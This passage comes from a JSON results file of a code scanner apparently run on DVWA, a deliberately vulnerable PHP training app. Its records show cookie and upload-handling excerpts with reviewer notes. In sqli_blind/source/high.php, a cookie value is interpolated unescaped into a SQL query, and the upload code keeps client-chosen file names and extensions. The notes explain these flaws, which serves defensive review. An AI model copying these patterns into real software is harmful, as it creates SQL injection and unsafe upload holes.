  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'exec'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 198,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'fi'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
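  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."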
 },
 {
  "id": 235,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$method</span>            <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span 
class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
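  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."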
 },
 {
  "id": 213,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$method</span>            <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span 
class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
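  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."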
 },
 {
  "id": 214,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
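  "note": "The isset() check on line 3 only confirms that the cookie exists. Its value is copied into $id on line 5 and interpolated into the SQL string on line 8, with no escaping or type check visible in this excerpt. Bind the value as a parameter in a prepared statement, or validate it as an integer first."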
 },
 {
  "id": 215,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
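  "note": "Source-to-sink path within the excerpt: $_COOKIE['id'] is assigned to $id (line 5), placed inside the quoted literal of the SELECT on line 8, and the resulting string is passed to mysqli_query() on line 9. No escaping or parameter binding is visible; use mysqli_prepare() with a bound parameter. The line 9 comment says 'or die' was removed to suppress MySQL errors, which does not change how the query is built."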
 },
 {
  "id": 251,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'upload'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
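  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."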
 },
 {
  "id": 282,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'xss_r'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
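  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."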
 },
 {
  "id": 293,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/index.php",
  "filetype": "php",
  "search": "\\s\\$_COOKIE",
  "match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'xss_s'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token 
punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 17,
  "start": 12,
  "end": 23,
  "severity": "unknown",
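  "note": "$_COOKIE['security'] is client-controlled. In this excerpt it is only compared against fixed case labels that assign constant file names, so no cookie data reaches $vulnerabilityFile directly; the requesting client still chooses the level. Check that the switch ends in a default branch (not visible here) and consider keeping the level in server-side session state."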
 },
 {
  "id": 252,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
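  "note": "$_FILES['uploaded']['name'] is supplied by the client. basename() on line 6 strips directory components, which keeps the target inside hackable/uploads/, but the stored name and its extension are still chosen by the uploader. Prefer a server-generated file name, and confirm the upload directory is not served as executable content."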
 },
 {
  "id": 253,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
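  "note": "The extension on line 10 is derived from the client-supplied name. strrpos() returns false when the name contains no dot, so false + 1 makes substr() start at offset 1 and the 'extension' becomes the name minus its first character. Handle the no-dot case explicitly, for example with pathinfo(), and do not treat the extension as proof of file type."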
 },
 {
  "id": 254,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token 
